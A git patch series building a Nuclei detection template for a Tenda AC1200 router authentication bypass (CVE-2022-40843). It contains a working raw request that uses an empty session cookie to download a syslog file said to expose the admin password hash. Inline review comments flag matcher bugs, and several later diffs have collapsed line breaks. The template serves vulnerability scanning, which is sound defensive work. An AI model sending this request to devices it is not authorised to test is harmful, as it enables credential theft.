From acf1f64b63979aebf25a653a3ec6ff53234fe275 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Thu, 3 Nov 2022 09:01:10 +0900
Subject: [PATCH 1/5] Create CVE-2022-40843

The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.

Signed-off-by: GwanYeong Kim
---
cves/2022/CVE-2022-40843.yaml | 42 +++++++++++++++++++++++++++++++++++
1 file changed, 42 insertions(+)
create mode 100644 cves/2022/CVE-2022-40843.yaml

diff --git a/cves/2022/CVE-2022-40843.yaml b/cves/2022/CVE-2022-40843.yaml
new file mode 100644
index 0000000000..447bcd2c80
--- /dev/null
+++ b/cves/2022/CVE-2022-40843.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-40843
+
+info:
+ name: Tenda AC1200 V-W15Ev2 - Authentication Bypass
+ author: gy741
+ severity: critical
+ description: |
+ The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
+ reference:
+ - https://boschko.ca/tenda_ac1200_router/?fbclid=IwAR1HrDTSgvo-Ah_dxXMvf53y_SW5cukyzqbQZbc4f5gRSm-ntAlPskLVYEI
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.9
+ cve-id: CVE-2022-40843
+ cwe-id: CWE-78
+ tags: cve,cve2022,tenda,auth-bypass,router
+
+requests:
+ - raw:
+ - |
+ GET /goform/downloadSyslog/syslog.log HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+ Cookie: W15Ev2_user=
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "Content-type: config/conf"
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "0001"
+ - "0002"
+ condition: and
From 947d3ce87f9a30e9bb973956a62852c1b27e1233 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 3 Nov 2022 23:31:09 +0530
Subject: [PATCH 2/5] Update CVE-2022-40843.yaml

---
cves/2022/CVE-2022-40843.yaml | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/cves/2022/CVE-2022-40843.yaml b/cves/2022/CVE-2022-40843.yaml
index 447bcd2c80..a4cf032c74 100644
--- a/cves/2022/CVE-2022-40843.yaml
+++ b/cves/2022/CVE-2022-40843.yaml
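Review bot: In patch 1/5 the header matcher `- "Content-type: config/conf"` is a case-sensitive word match, so it fires only if the response headers reach the matcher with exactly that spelling. If the HTTP client normalises header names to `Content-Type`, a vulnerable router would be reported as clean because `matchers-condition` is `and`. I would add `case-insensitive: true` to that matcher, or match only the value `config/conf`, and confirm the spelling against a captured response from an affected device. None of the later patches in this series change this matcher as far as their hunks show.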
@@ -7,7 +7,7 @@ info: description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. reference: - - https://boschko.ca/tenda_ac1200_router/?fbclid=IwAR1HrDTSgvo-Ah_dxXMvf53y_SW5cukyzqbQZbc4f5gRSm-ntAlPskLVYEI + - https://boschko.ca/tenda_ac1200_router classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.9 @@ -26,6 +26,12 @@ requests: matchers-condition: and matchers: + - type: word + words: + - "0001" + - "0002" + condition: and + - type: word part: header words: @@ -34,9 +40,3 @@ requests: - type: status status: - 200 - - - type: word - words: - - "0001" - - "0002" - condition: and From 935906680da66320d97ec003cf8897ea34c8b124 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:43:38 +0530 Subject: [PATCH 3/5] updated matcher & info --- cves/2022/CVE-2022-40843.yaml | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-40843.yaml b/cves/2022/CVE-2022-40843.yaml index a4cf032c74..dcf2f460a7 100644 --- a/cves/2022/CVE-2022-40843.yaml +++ b/cves/2022/CVE-2022-40843.yaml 
@@ -8,29 +8,36 @@ info: The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. reference: - https://boschko.ca/tenda_ac1200_router + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L cvss-score: 9.9 cve-id: CVE-2022-40843 - cwe-id: CWE-78 - tags: cve,cve2022,tenda,auth-bypass,router + cwe-id: CWE-287 + metadata: + max-request: 1 + tags: cve,cve2022,tenda,auth-bypass,router,iot requests: - raw: - | GET /goform/downloadSyslog/syslog.log HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Cookie: W15Ev2_user= - Connection: close matchers-condition: and matchers: + - type: regex + regex: + - '^0\d{3}$' + - type: word + part: body words: - - "0001" - - "0002" - condition: and + - "[system]" + - "[error]" + - "[wan1]" + condition: or - type: word part: header From 5698c2f45a55f567084ca1f4fa30471961d81f7a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:44:50 +0530 Subject: [PATCH 4/5] Rename cves/2022/CVE-2022-40843.yaml to http/cves/2022/CVE-2022-40843.yaml --- {cves => http/cves}/2022/CVE-2022-40843.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {cves => http/cves}/2022/CVE-2022-40843.yaml (100%) 
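Review bot: In patch 3/5 the new regex matcher `- '^0\d{3}$'` has no `part` and no multi-line flag. Nuclei compiles matcher regexes with Go's regexp package, where `^` and `$` anchor to the start and end of the whole input unless `(?m)` is set, so against a multi-line syslog body it can match only when the entire body is four digits. Because `matchers-condition` is `and`, that would make the template miss affected devices. If the intent is to match a log line holding only the four-digit index, I would write `- '(?m)^0\d{3}\r?$'` (the `\r?` covers CRLF line endings) and add `part: body`, as the word matcher below it has.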
diff --git a/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml similarity index 100% rename from cves/2022/CVE-2022-40843.yaml rename to http/cves/2022/CVE-2022-40843.yaml From fab7db909a24c55ca89a7e4bd23354dc35be758e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 2 Aug 2023 10:00:36 +0530 Subject: [PATCH 5/5] http update --- http/cves/2022/CVE-2022-40843.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index dcf2f460a7..fef7fc5688 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -18,7 +18,7 @@ info: max-request: 1 tags: cve,cve2022,tenda,auth-bypass,router,iot -requests: +http: - raw: - | GET /goform/downloadSyslog/syslog.log HTTP/1.1